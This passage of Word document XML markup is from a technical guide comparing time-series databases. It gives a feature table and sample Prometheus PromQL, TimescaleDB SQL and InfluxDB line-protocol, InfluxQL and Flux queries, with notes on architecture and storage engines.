              <w:t>Model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C5615F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Storage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352D24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="422C7D4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1B7C4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Prometheus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7C64F3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Pull-based metrics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3982FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Local TSDB (Gorilla + blocks)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62ED0A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Kubernetes monitoring, alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="05566D8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CE4B02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>InfluxDB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205322" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Push-based, InfluxQL/Flux</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221D2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>TSM (Time-Structured Merge Tree)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C5979F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>IoT, general-purpose TSDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="35412A5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B59C4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>TimescaleDB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3A2D42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>PostgreSQL extension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E71D69" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hypertables (chunked)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601638" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>SQL-native time-series, relational + TS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1AD2FCC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028787" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>ClickHouse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160ECD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Columnar analytical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429043" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>MergeTree (LSM-like)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A52040" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Analytics, logs, high-cardinality metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="03B0D7A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387414" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>QuestDB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C9DA90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Append-only columnar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D2A219" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Column-based storage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A1867A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Ultra-high ingestion rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4DBAE99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4DF9A3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>VictoriaMetrics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6E9F21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Prometheus-compatible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DBA8AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Custom TSDB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E2E012" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Long-term Prometheus storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="6D265B4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A0BBB3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Apache Druid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4D7415" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Column-oriented, pre-aggregated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6B09FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Segments (immutable)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6B303D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Real-time analytics, OLAP + time-series</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73882800" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49738235" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F570EFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t># Data model: metric{labels} value timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E6AA51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>http_requests_total{method="GET", endpoint="/api/users", status="200"} 1234 1716912345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120DE70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="05022FA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t># Query (PromQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEADFA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>rate(http_requests_total{status="500"}[5m])  # Error rate over last 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092D62C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>histogram_quantile(0.99, rate(http_request_duration_seconds_bucket[5m]))  # p99 latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2F1AEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06288769" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF790C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Targets (exporters) ←── scrape ──── Prometheus Server ──── AlertManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27339A27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD8704" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                    Local TSDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79214472" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BB8C3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                              Remote Write (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFBD83F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3C6B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                    Thanos / Cortex / Mimir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A8464" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                                    (long-term storage, HA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F85AF1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669BF3FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Single node (not natively distributed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EBB51C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Limited to local disk (retention typically 15–30 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FAD3D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Pull-based only (can't push from short-lived jobs easily — use Pushgateway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5F499" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1576"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>No true high availability (separate instances have slightly different data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B559BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling Prometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30407E6E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Thanos: sidecar per Prometheus, stores blocks in object storage (S3), global querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F027A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Cortex/Mimir (Grafana): Horizontally scalable, multi-tenant Prometheus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4EC4DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>VictoriaMetrics: Drop-in Prometheus replacement, better performance and compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2EAC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 TimescaleDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59560A11" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CD2157" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Create hypertable (automatically partitioned by time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84E769" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>CREATE TABLE metrics (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AE9B0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  time TIMESTAMPTZ NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527F6836" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  device_id TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDD0D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  temperature DOUBLE PRECISION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED166D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  humidity DOUBLE PRECISION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426298C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BC1F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SELECT create_hypertable('metrics', 'time');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9CF900" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7009276D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Query: standard SQL!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A63CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SELECT time_bucket('1 hour', time) AS hour,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D139C32" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       device_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BF326" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       AVG(temperature) as avg_temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268BA923" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>FROM metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E45D42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>WHERE time &gt; NOW() - INTERVAL '7 days'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA9A00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  AND device_id = 'sensor-42'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A52B07E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GROUP BY hour, device_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214997FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ORDER BY hour;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F585998" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Full SQL compatibility (JOINs with relational tables, full PostgreSQL ecosystem, extensions like PostGIS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71D4CB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD288A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>PostgreSQL extension (not a separate database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23092A33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>"Hypertables": automatically partition data into time-based chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4A7F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Each chunk is a regular PostgreSQL table (benefits from existing indexing, compression, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB91FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Compression: columnar compression on older chunks (90–95% compression).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC2452" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Continuous aggregates: pre-computed rollups updated incrementally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA4B56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 InfluxDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28EB27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1E087" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Line protocol (write format):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F7F12" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>cpu,host=server-42,region=us-east usage=72.3,idle=27.7 1716912345000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADAC22F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="65586D99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// InfluxQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C716F69" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SELECT MEAN(usage) FROM cpu WHERE region = 'us-east' AND time &gt; now() - 1h GROUP BY time(1m), host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBC70A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="029FB7CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// Flux query (functional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B2656" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>from(bucket: "metrics")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA9C8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  |&gt; range(start: -1h)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B44F2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  |&gt; filter(fn: (r) =&gt; r._measurement == "cpu" and r.region == "us-east")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E1A55" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  |&gt; aggregateWindow(every: 1m, fn: mean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755166E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Storage engine (TSM — Time-Structured Merge Tree):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A54DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Write-Ahead Log (WAL) for durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5EF56" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>In-memory cache (similar to LSM memtable).</w:t>
      </w:r>
    </w:p>
